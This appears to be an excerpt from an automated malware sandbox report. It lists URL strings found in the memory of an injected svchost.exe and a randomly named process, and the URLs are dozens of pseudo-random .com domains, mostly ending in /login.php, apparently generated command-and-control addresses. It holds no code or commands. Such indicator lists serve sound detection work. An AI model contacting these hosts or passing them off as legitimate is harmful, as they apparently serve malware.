Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633515874.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630932773.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630421381.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632737159.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofybic.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2687870645.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599472059.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590845275.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589828940.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589542688.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofycot.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638315636.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofycyk.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofydac.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633515874.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630932773.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623381188.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630421381.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632737159.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624452735.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofygaf.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofygum.com/e1f-9bc86c8e8c94
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564981200.000000000CC62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofygum.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930331574.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910676982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofykyt.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648070186.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1651544037.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofypam.com/login.php
Source: svchost.exe, 00000002.00000003.1661503631.000000000333D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664095073.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664828097.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyqek.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656232987.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656025861.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyruc.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyzof.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojybek.com/login.php
Source: svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639886879.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880572377.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649417555.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojybim.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycec.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojydam.com/H
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojydam.com/http://qegysoq.com/H
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojydam.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojydoc.com/
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojygut.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498635965.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyjof.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyjyc.com/
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633515874.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630932773.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630421381.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632737159.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojymet.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojypat.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001297000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.0000000001368000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://vojyqem.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815884349.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603144571.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817894345.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyzyt.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648070186.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1651544037.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volybut.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2074336490.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076390642.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079858298.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080554579.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952973013.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079969618.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1917692103.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080157740.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656157026.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076185402.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1950331749.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1950940753.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2075366204.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951109934.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899366935.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1948330211.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volycem.com/login.php
